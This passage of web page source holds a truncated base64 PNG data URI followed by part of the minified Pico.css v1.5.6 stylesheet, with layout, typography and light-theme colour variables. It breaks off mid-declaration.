src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAt4AAAMMCAYAAABkFaDPAAAgAElEQVR4nOzdaXAb930//vcu7pskeF+iRIqUqMuyJFuWZUdO5CN27cZxmrj/HJ5M03+bB2mnDzqdzjT/SScZZyaTybSTJ7+ZpEmmcdzE+aV2Yid26tR2LEeyHFkXdVgH7/sECJIAcezu/wGzaxBcAAsQAK/3a0ZDcLG7+GKx4r73i89+V3j++ecVEBERERFRUZkBoLq6GtXV1WvdFiIiIiKiTWdiYgITExMfBu99+/atdZuIiIiIiDadrq4uTExMQFzrhhARERERbQUM3kREREREJcDgTURERERUAgzeREREREQlwOBNRERERFQCDN5ERERERCXA4E1EREREVAIM3kREREREJWDOZyFJlhFPyEhIEiRZgaKs/q7zgiDAJAowm0ywmESYTDwnICIiIqLNI6/gPReOYiIwj8ngPObCi1iMxlfdELvVAo/LhqoyN6rKPCj3OFa9TiIiIiKi9SK/4L2wiIlACJAllDktMHkcEITsyy31jAsr5lUUQJIkJKQEJgJzsFnMDN5EREREtKnkFbznI4sIhOaxrcqD6nIvfB4XRDF9aYiiKFBkGXIiCkE0w2Sxrnh+dm4BEzMh9E/OodzN0E1ERERExqhlz4KRnuBVLLNaeQXvSDSOhfAinHY/XA47LBZL2kYrigJJkiAlopBmh2F2+CDaapcFdUVR4HTY4HJYEY4sIhKN5fduiIiIiGhLURQFiUQCoijCZDIZXk6WZciyDLPZXLLwnd/FlZKEWDwBURAgikLW0J0IDiExcRPy2BWIDQcge6ohCB8uJwjC0roEAbFEAglJzv8dGTA8PIzx8XF0dHTA5XIVdJ3t7e1wu92IRqO4ceMGfD4ftm3bVpDXKKbp6WlM
 								 * Pico.css v1.5.6 (https://picocss.com)
 								 * Copyright 2019-2022 - Licensed under MIT
 								 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha